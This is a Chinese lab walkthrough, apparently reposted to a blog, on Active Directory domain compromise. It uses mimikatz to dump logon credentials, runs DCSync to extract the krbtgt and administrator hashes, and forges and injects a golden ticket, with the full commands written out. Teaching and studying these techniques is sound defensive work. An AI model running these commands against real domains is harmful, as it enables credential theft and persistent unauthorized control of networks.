域渗透之通过DCSync获取权限并制作黄金票据

最新推荐文章于 2024-06-19 15:22:30 发布
最新推荐文章于 2024-06-19 15:22:30 发布
阅读量774 收藏 4
点赞数
原文链接:http://www.cnblogs.com/KevinGeorge/p/10463527.html
版权

环境背景

  • 账号:
    • admin 没有域管权限
    • admin02 有域管权限
    • administrator 有域管权限
  • 模拟渗透过程:
利用任意方法已经登录到client1(Windows 7),在client1上获取到了admin02的权限,进行DCSync获取krbtgt的hash,制作黄金票据,并远程IPC访问域控Windows Server 2012

1070321-20190302222117003-549076584.png
1070321-20190302222155928-365590305.png

登录Client1抓取域管凭证

1070321-20190302222359231-671316095.png
尝试dcsync
1070321-20190302222853733-2122157131.png
尝试获取域管权限
1070321-20190302223059126-1254565940.png
尝试在本机上与mimikatz抓取这个组内的成员的hash

privilege::debug
sekurlsa::logonpasswords

1070321-20190302224420865-516292270.png
切换到admin02执行DCSync

lsadump:dcsync /user:krbtgt /domain:sec.com
lsadump:dcsync /user:administrator /domain:sec.com

1070321-20190302224805617-340179134.png
1070321-20190302224848477-1295417446.png

制作使用黄金票据

kerberos::golden /user:administrator /domain:sec.com /sid:s-1-5-21-2824519120-46247909-3994855717-500 /krbtgt:251ebdd7727334d9ade0415bf79d255a /ticket:super.ticket
kerberos:ptt super.ticket

1070321-20190302230518779-588394760.png
1070321-20190302230859306-1406152709.png

转载于:https://www.cnblogs.com/KevinGeorge/p/10463527.html

weixin_30886233
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透中的DPAPI和Kerberos协议.pdf
08-08
议题分享主要介绍了渗透中数据保护API架构逻辑和Kerberos认证协议的通信流程,同时从攻击者的角度谈了DPAPI和Kerberos协议的利用,最后给出常见攻击思路的防御和缓解措施。 1.1 DPAPI架构 1.2 DPAPI加密机制 1.3 ...
利用DSCync进行权限维持
越努力 越自由
03-02 519
一个环境可以拥有多台控制器,每台控制器各自存储着一份所在的活动目录的可写副本,对目录的任何修改都可以从源控制器同步到本树或林中的其他控制器上。当一个控想从另一个获取数据更新时,客户端控会向服务端控发送DSGetNCChanges请求,该请求的响应将包含客户端控必须应用到其他活动目录副本的一组更新。通过情况下,控制器之间每15分钟就会有一次数据同步。DCSync技术就是利用控制器同步的原理,通过DRS服务的某接口向控发起数据同步请求。
环境权限维持之Dcsync
越努力 越自由
04-19 1425
当获得了内管理员权限,如果能修改内普通用户的权限,使其具有DCSync权限的话,那么普通用户也能导出内用户的哈希,这样可以做一个隐蔽的权限维持。默认只有控主机账号和管理员能Dcsync管和邮件服务器的机器账号有写ACL的权限,可以给指定用户添加Dcsync来dump哈希
内网渗透之滥用DCSync
最新发布
2401_85027082的博客
06-19 741
中,不同的控之间,默认每隔15min就会进行一次数据同步。当一个额外的控想从其他控同步数据时,额外控会像其他控发起请求,请求同步数据。如果需要同步的数据比较多,则会重复上述过程。DCSync就是利用这个原理,通过目录复制服务(Directory Replication Service,DRS)的GetNCChanges接口像控发起数据同步请求,以获得指定控上的活动目录数据。目录复制服务也是一种用于在活动目录中复制和管理数据的RPC协议。该协议由两个RPC接口组成。
权限维持】-DCsync
qq_41617902的博客
01-20 529
DCsync:模拟控制器并从控制器导出帐户密码hash
黄金票据制作原理及利用方式
Happy峰
09-23 2772
Golden Ticket黄金票据制作原理及利用方式 Krbtgt账户介绍 krbtgt用户,是系统在创建时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成 的,无法登录主机 黄金票据原理 TGT=Krbtgt的html hash 加密 1、Kerberos中的TGT和Logon Session Key(CT_SK)是AS返回的 ,TGP它是由Krbtgt加密和签名的 ,krbtgt的NTLM Hash又是固定的,而CT_SK并不会保存在KDC中。 2、所以只要得到krbtgt
基于MSF框架下的kiwi模块制作黄金票据
weixin_60109175的博客
04-05 5715
目录 一、kiwi模块使用简介 1.权限问题 2.使用注意事项 3.关于kiwi的命令简介 二、实验过程 1.环境构成 2.实验步骤 三、黄金票据制作使用 1.制作票据的条件,以及如何获取该条件内容 2.制作黄金票据 3.黄金票据的使用 一、kiwi模块使用简介 1.权限问题 kiwi模块的使用需要内管理员或者系统权限,如果是非管理员权限那么使用会受到很大的限制 2.使用注意事项 msf中的kiwi模块同时支持32位和64位操作系统,...
用excel制作票据打印模板的技巧.pdf
11-16
用excel制作票据打印模板的技巧.pdf
渗透工具包
01-15
【标题】:“渗透工具包”是指一组专门用于在Windows操作系统环境下进行权限提升和攻击的工具,主要包括mimikatz、psexec以及ms14-068漏洞利用工具。 【描述】:在网络安全领渗透是攻击者试图获取对...
thinkphp6开发微信第三方平台获取验证票据.zip
02-27
thinkphp6开发微信第三方平台获取验证票据.zip
由浅入深的渗透系列一(下)1
08-03
8. **创建黄金票据**:黄金票据是一种高级的权限提升技术,可以创建自定义的 Kerberos 票据,使攻击者能够在中模拟任何用户或服务。 9. **内网穿透**:通过在Kali Linux上运行Empire代理并配置代理链(如`...
3.4 Golden Ticket黄金票据制作原理及利用方式
GloryGod的博客
08-24 267
krbtgt用户,是系统在创建时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成的,无法登录主机。
黄金票据原理制作与利用
G3et的博客
01-14 578
1、用管理运行mimikatz抓取完所需的东西 ==> 再到用户机器上运行伪造票据。2、krbtgt只存在控上面,普通机器提权之类的无法获取到krbtgt的hash3、黄金票据可以获取任何Kerberos 服务权限,且由 krbtgt 的 hash 加密,黄金票据在使用的过程需要和控通信****加粗样式。
内网渗透(六十三)之滥用DCSync
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-06 902
中,不同的控之间,默认每隔15min就会进行一次数据同步。当一个额外的控想从其他控同步数据时,额外控会像其他控发起请求,请求同步数据。如果需要同步的数据比较多,则会重复上述过程。DCSync就是利用这个原理,通过目录复制服务(Directory Replication Service,DRS)的GetNCChanges接口像控发起数据同步请求,以获得指定控上的活动目录数据。目录复制服务也是一种用于在活动目录中复制和管理数据的RPC协议。该协议由两个RPC接口组成。
内网渗透测试:DCSync 攻击技术的利用
dzqxwzoe的博客
08-20 573
环境中,不同控制器(DC)之间,每 15 分钟都会有一次数据的同步。当一个控制器(DC 1)想从其他控制器(DC 2)获取数据时,DC 1 会向DC 2 发起一个 GetNCChanges 请求,该请求的数据包括需要同步的数据。如果需要同步的数据比较多,则会重复上述过程。DCSync就是利用的这个原理,通过 Directory Replication Service(DRS) 服务的 GetNCChanges接口向控发起数据同步请求。
dcsync 权限维持
admin的博客
05-23 1207
DCSync渗透中经常会用到的技术,其被整合在了 Mimikatz 中。在 DCSync 功能出现之前,要想获得用户的哈希,需要登录控制器,在控制器上执行代码才能获得用户的哈希。该功能可以模仿一个控制器,从真实的控制器中请求数据,例如用户的哈希。该功能最大的特点就是不用登陆控制器,即可远程通过数据同步复制的方式获得控制器上的的数据。
黄金票据制作-新手向
m0_74834253的博客
03-31 724
最近,我学习了内网渗透的相关知识,其中包括了黄金票据的应用。黄金票据涉及的原理和攻击方法构成了一系列复杂的概念,晦涩难懂。简而言之,黄金票据在内网渗透中主要用于权限维持,即留下后门。使用黄金票据前提是你已经控制了整个控制器。其核心原理与服务器中的krbtgt用户相关。如果想深入理解黄金票据的工作原理,需要进一步研究Kerberos协议。
内网渗透--Golden Ticket(黄金票据制作&利用
qq_62169455的博客
01-17 1435
伪造TGT,不需要和KDC进行校验,金票可以直接在本地生成,在内机器和非内机器都可以使用。
黄金票据制作-新手入门
weixin_42109829的博客
12-27 2345
0x01 前言 相信准备学习内网渗透的人,都会知道有黄金票据这个事情,而黄金票据的原理是和攻击方式,网站说的都一大堆概念,很难懂,这里我说声明一下,黄金票据的作用在于做权限维持 ,原理在于服务器上有一个krbtgt用户 0x02 黄金票据和krbtgt 用户的关系 ​ Golden Ticket(下面称为金票)是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。可以说有了金票
内网渗透黄金票据和白银票据的区别
03-31
1. 黄金票据通常是使用被攻破的控制器的管理员账户来获取的,因此具有更高的权限,可以访问中的所有资源和计算机。而白银票据则是使用已经被攻破的计算机的本地管理员账户来获取的,权限相对较低。 2. 黄金票据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值